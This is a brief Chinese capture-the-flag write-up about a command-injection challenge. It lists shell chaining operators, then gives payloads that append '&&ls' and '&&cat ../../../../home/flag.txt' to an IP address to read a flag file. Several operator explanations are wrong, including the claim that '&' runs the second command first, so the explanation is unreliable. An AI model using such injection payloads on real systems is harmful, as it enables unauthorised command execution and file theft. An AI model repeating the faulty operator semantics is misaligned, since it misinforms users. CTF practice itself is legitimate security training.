1.查看环境
2.可以利用字符串拼接,需要掌握有关命令执行的知识
windows 或 linux 下:
command1 && command2 先执行 command1,如果为真,再执行 command2
command1 | command2 只执行 command2
command1 & command2 先执行 command2 后执行 command1
command1 || command2 先执行 command1,如果为假,再执行 command2
命令执行漏洞(| || & && 称为 管道符)
payload:
127.0.0.1&&ls
127.0.0.1&&ls ../
发现在home目录下的flag.txt
127.0.0.1&&cat ../../../../home/flag.txt
即可获取flag
参考文章: